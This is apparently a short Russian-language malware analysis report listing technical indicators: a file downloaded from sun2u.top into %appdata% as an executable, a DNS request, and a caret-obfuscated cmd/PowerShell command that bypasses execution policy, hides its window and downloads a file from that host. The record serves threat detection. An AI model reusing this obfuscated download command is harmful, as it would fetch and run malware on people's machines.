Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^W^ER^s^h^E^lL.e^xe^ ^-EX^e^cuTi^onPOl^IC^y^ ^B^Y^p^A^ss -nO^pRO^File -wiN^dow^sTyLe ^hiD^de^N (NEw^-^OB^J^e^cT sYS^T^Em^.n^eT.W^ebcL^Ie^Nt).^DOwNLoadfIl^E('http://sun2u...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /c "po^W^ER^s^h^E^lL.e^xe^ ^-EX^e^cuTi^onPOl^IC^y^ ^B^Y^p^A^ss -nO^pRO^File -wiN^dow^sTyLe ^hiD^de^N (NEw^-^OB^J^e^cT sYS^T^Em^.n^eT.W^ebcL^Ie^Nt).^DOwNLoadfIl^E('http://sun2u...' (со скрытым окном)